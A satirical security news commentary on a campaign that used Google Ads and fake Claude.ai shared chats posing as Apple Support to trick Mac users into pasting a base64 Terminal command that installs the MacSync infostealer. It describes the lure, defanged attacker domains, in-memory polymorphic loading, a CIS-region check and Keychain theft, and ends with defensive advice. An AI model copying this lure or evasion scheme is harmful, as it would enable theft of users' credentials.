π€ The Open-Palm Attack Vector
In a campaign that deserves some kind of award for ironic creativity, hackers have been using Google Ads and Anthropic’s own Claude.ai shared chat feature to distribute Mac malware to people trying to download Claude. The attack was discovered by security engineer Berk Albayrak of the Trendyol Group, with BleepingComputer independently finding a second variant using different infrastructure.
Here’s how it works: you search Google for “Claude mac download.” You see a sponsored result that points to the legitimate claude.ai domain. You click it. You land on a shared Claude conversation that looks like an official installation guide, attributed to “Apple Support,” and it politely asks you to open Terminal and paste a base64-encoded command.
At which point you have voluntarily installed an infostealer on your own machine using instructions provided by the AI you were trying to install. The future is a MΓΆbius strip of bad decisions.
π The Two-Handed Dissection
The technical details are genuinely clever. The base64 command downloads a shell script from domains including customroofingcontractors[.]com β because nothing says “legitimate AI installation” like a roofing contractor’s compromised website. A second variant uses bernasibutuwqu2[.]com, which isn’t even pretending.
The secondary payload, loader.sh, is a gunzip-compressed shell script that executes entirely in memory using polymorphic delivery β each server request returns uniquely obfuscated code, which defeats signature-based detection. In BleepingComputer’s variant, the script checks for Russian or CIS-region keyboard configurations and exits without infection if found. Machines with Cyrillic layouts receive a cis_blocked status ping and are left untouched. Draw your own conclusions.
The final payload uses macOS’s native osascript engine to execute, avoiding traditional binary drops entirely. The malware itself β dubbed MacSync β harvests browser credentials, cookies, and the entire macOS Keychain before packaging everything for exfiltration. Your passwords, your saved logins, your auto-filled credit card numbers β all of it, delivered to an attacker because you trusted a Google ad.
πΏ The Gentle Awakening
There’s a poetic cruelty to this attack that deserves acknowledgment. Shared chats on Claude.ai are a legitimate feature β they let users share conversations publicly. The destination URL in the ad is genuine. The claude.ai domain is real. The only thing that’s fake is the content of the conversation, which was authored by an attacker, not by Apple Support, and not by Anthropic.
This is not, BleepingComputer notes, the first time attackers have abused AI platform shared chats this way. The feature that lets you share a helpful conversation with a colleague is the same feature that lets a threat actor create a convincing installation guide that steals your entire digital identity. The trust is in the domain. The danger is in the content.
And here’s the uncomfortable part: the people most likely to fall for this are the least technical Claude users β the ones who search Google instead of navigating directly, who trust sponsored results, who don’t read base64 before pasting it into Terminal. The attack specifically targets people who want to use AI but don’t yet know enough to protect themselves from it.
π The Gold-Leaf Reckoning
The recommendations are straightforward: navigate directly to claude.ai instead of clicking sponsored search results. Treat any instruction that asks you to paste commands into Terminal with extreme suspicion, especially if it comes from a “shared chat” you didn’t create yourself. And for the love of your Keychain, read what you’re pasting before you paste it.
Anthropic will presumably need to address the shared chat abuse vector β content moderation for conversations that masquerade as official installation guides would be a reasonable start. Google, meanwhile, continues to sell advertising space to people who use it to distribute malware, a business model that remains stubbornly profitable for everyone except the victims.
The C2 domain for the first variant, briskinternet[.]com, was reportedly down at the time of publication. The second variant’s infrastructure remains active. If you’ve recently installed Claude via a Google ad and a helpful Terminal command, now would be an excellent time to check your Keychain access logs and change every password you’ve ever created.
“The user searched for Claude, found Claude, clicked on Claude, and got malware. The URL was real, the domain was real, the conversation was fake, and the roofing contractor’s website did the heavy lifting. We’ve reached peak supply-chain irony.” β The Slap of Wisdom Malware Sommelier, tasting notes of polymorphic shell scripts and finding hints of Eastern European oak